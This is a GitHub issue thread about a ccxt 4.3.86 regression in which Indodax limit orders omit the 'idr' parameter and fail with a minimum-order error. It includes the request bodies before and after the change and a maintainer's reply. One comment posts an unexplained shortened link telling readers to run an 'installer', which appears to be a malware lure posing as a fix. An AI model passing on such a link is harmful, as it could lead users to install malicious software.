### ISSUE TITLE
[Indodax] Cannot post limit order since 4.3.86

### ISSUE THREAD

**Issue by jazarja** [ccxt/ccxt#23618]
### Operating System

Windows

### Programming Languages

JavaScript

### CCXT Version

4.3.86

### Description

On 4.3.86, a commit was made to implement market orders for Indodax (https://github.com/ccxt/ccxt/pull/23425). However, this commit introduced a bug affecting limit orders, resulting in the following error from the Indodax platform:

```
ResponseBody:
  {"success":0,"error":"Minimum order 10,000 IDR","error_code":""}
```

The issue arises because, starting with version 4.3.86, the "idr" (quote currency) parameter is no longer included in the request.

Example of the request before version 4.3.86:
```
RequestBody:
 method=trade&timestamp=1725324412809&recvWindow=10000&pair=xrp_idr&type=buy&price=7000&idr=14000&xrp=2
```

Example of the request in version 4.3.86:
```
RequestBody:
 method=trade&timestamp=1725324844662&recvWindow=10000&pair=xrp_idr&type=buy&price=7000&xrp=2
```

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by carlosmiei** [comment]
@jazarja can you please upgrade and try again?
